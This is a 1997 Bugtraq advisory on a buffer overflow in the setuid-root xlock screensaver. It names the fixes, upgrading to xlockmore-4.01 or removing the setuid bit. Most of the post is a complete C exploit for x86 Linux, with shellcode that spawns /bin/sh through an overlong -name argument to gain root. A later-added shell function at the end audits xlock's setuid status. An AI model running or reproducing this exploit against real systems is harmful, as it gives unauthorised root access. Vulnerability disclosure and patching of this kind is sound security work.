Date: Sat, 26 Apr 1997 16:16:05 -0400
From: George Staikos
Reply-To: George Staikos
Sender: Bugtraq List
Approved-By: aleph1@UNDERGROUND.ORG
Subject: Overflow in xlock
To: BUGTRAQ@NETSPACE.ORG

There appears to be an exploitable buffer overflow in xlock, the X based screensaver/locker. Xlock is installed suid root on machines with shadowed passwords.
I have verified this on xlock versions on AIX 4.x and Linux (exploit for Linux posted below), but I cannot determine what version I was using, as xlock does not seem to contain version information in the binary and I don't have the original source. The overflow is in the -name parameter, and it is fixed in xlockmore-4.01, available on sunsite in /pub/Linux/X11/screensavers/xlockmore-4.01.tgz . Other platforms have not been checked for this, and while this is an older version of xlock, many systems seem to come preloaded with this version. Also, xlock does not need to be suid root unless it is running on a machine with shadowed passwords, so another possible fix is chmod u-s xlock.

/*
 * x86 XLOCK overflow exploit by cesaro@0wned.org 4/17/97
 * Original exploit framework - lpr exploit
 *
 * Usage: make xlock-exploit
 *        xlock-exploit
 *
 * Assumptions: xlock is suid root, and installed in /usr/X11/bin
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996

/* Returns the current stack pointer (x86 only: result left in %eax). */
long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(int argc, char *argv[])
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int dfltOFFSET = DEFAULT_OFFSET;
    u_char execshell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
        "\xd7\xff\xff\xff/bin/sh";
    int i;

    /* An alternative stack offset may be given on the command line. */
    if (argc > 1)
        dfltOFFSET = atoi(argv[1]);
    else
        printf("You can specify another offset as a parameter if you need...\n");

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }

    /* Build the oversized -name argument: padding, payload, then the
     * return address guessed from the current stack pointer. */
    ptr = buff;
    memset(ptr, 0x90, BUFFER_SIZE - strlen(execshell));
    ptr += BUFFER_SIZE - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];
    addr_ptr = (long *)ptr;
    for (i = 0; i < 2; i++)
        *(addr_ptr++) = get_esp() + dfltOFFSET;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
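As an added defender-side check (not part of the original post or of the exploit above), the following shell function encodes the two mitigations the post gives: it reports whether a given xlock binary is setuid, and, if so, whether shadowed passwords make that bit necessary (upgrade to xlockmore-4.01) or not (chmod u-s suffices). The binary path and the shadow-file path are passed in as arguments, which is an assumption made for testability.

```shell
#!/bin/sh
# Added example, not from the original post. Audits one xlock binary for the
# setuid-root exposure described above.
#   Usage: xlock_audit /usr/X11/bin/xlock [/etc/shadow]
# Prints exactly one verdict: NOT_FOUND, NOT_SETUID, DROP_SETUID or UPGRADE_REQUIRED.
xlock_audit() {
    bin="$1"
    shadow="${2:-/etc/shadow}"   # presence of this file signals shadowed passwords

    if [ ! -f "$bin" ]; then
        echo "NOT_FOUND"
        return 1
    fi

    if [ ! -u "$bin" ]; then
        # No setuid bit: an overflow in -name gains nothing beyond the caller's rights.
        echo "NOT_SETUID"
        return 0
    fi

    if [ ! -f "$shadow" ]; then
        # Passwords are not shadowed, so xlock can verify them without root:
        # the setuid bit is unnecessary and "chmod u-s" is the cheap fix.
        echo "DROP_SETUID"
        return 2
    fi

    # Shadowed passwords need root to read, so the bit stays; the only fix is
    # replacing the binary with the fixed release (xlockmore-4.01 per the post).
    echo "UPGRADE_REQUIRED"
    return 3
}
```

Run it as `xlock_audit /usr/X11/bin/xlock` on a live system; the verdict maps directly onto the two fixes named in the post.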